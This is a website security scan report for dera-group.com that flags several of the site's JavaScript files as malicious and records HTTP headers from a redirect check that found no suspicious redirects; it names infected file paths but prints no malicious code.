Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dera-group.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://dera-group.com/ | 200 OK Content-Length: 8330 Content-Type: text/html | clean |
http://dera-group.com/_src/pl.js | 200 OK Content-Length: 27455 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://dera-group.com/_src/m.js | 200 OK Content-Length: 12494 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://dera-group.com/_src/mu.js | 200 OK Content-Length: 12375 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://dera-group.com/_src/j.js | 200 OK Content-Length: 12412 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://dera-group.com/_src/t.js | 200 OK Content-Length: 12450 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://dera-group.com/_src/subwin.js | 200 OK Content-Length: 11653 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://dera-group.com/_src/togglebox.js | 200 OK Content-Length: 12917 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://dera-group.com/index.asp | 200 OK Content-Length: 8330 Content-Type: text/html | clean |
http://dera-group.com/missionstatement.asp | 200 OK Content-Length: 4657 Content-Type: text/html | clean |
http://dera-group.com/briefhistory.asp | 200 OK Content-Length: 5060 Content-Type: text/html | clean |
http://dera-group.com/deragroup.asp | 200 OK Content-Length: 6799 Content-Type: text/html | clean |
http://dera-group.com/quality.asp | 200 OK Content-Length: 4980 Content-Type: text/html | clean |
http://dera-group.com/productsandservices.asp | 200 OK Content-Length: 6773 Content-Type: text/html | clean |
http://dera-group.com/jobsatdera.asp | 200 OK Content-Length: 7224 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dera-group.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 22 Dec 2014 12:40:45 GMT
Server: Microsoft-IIS/6.0
Content-Length: 8330
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSAQCTACB=PNKHKIAAMDKBDMMNKPOGLMGI; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...8330 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dera-group.com
Referer: http://www.google.com/search?q=dera-group.com
Result:
The result is similar to the first query. No suspicious redirects were found.